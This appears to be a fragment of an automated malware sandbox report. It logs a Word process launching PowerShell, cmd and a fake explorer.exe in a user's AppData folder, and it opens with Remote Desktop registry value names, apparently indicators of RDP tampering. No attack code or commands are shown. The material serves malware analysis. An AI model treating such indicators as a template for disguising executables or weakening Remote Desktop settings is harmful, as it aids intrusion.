VCfDenyTSConnectionsEnableConcurrentSessionsAllowMultipleTSSessionsRDPClipNameType
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\cmd.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\explorer.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\explorer.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\explorer.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\explorer.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\explorer.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\explorer.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\explorer.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\explorer.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\explorer.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\explorer.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\explorer.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\explorer.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\explorer.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\explorer.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\explorer.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\explorer.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\explorer.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\explorer.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\explorer.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\explorer.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\explorer.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\explorer.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\explorer.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\explorer.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\explorer.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\explorer.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\explorer.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\explorer.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\explorer.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\explorer.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\explorer.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\explorer.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\explorer.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\explorer.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\explorer.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\explorer.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\explorer.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\explorer.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\explorer.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\explorer.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\explorer.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\explorer.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\explorer.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\explorer.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\explorer.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\explorer.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\explorer.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\explorer.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\explorer.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\explorer.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\explorer.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\explorer.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\explorer.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\explorer.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\explorer.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\explorer.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\explorer.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\explorer.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\explorer.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\explorer.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\explorer.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\explorer.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\explorer.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\explorer.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\explorer.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\explorer.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\explorer.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\explorer.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\explorer.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\explorer.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\explorer.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\explorer.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\explorer.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\explorer.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
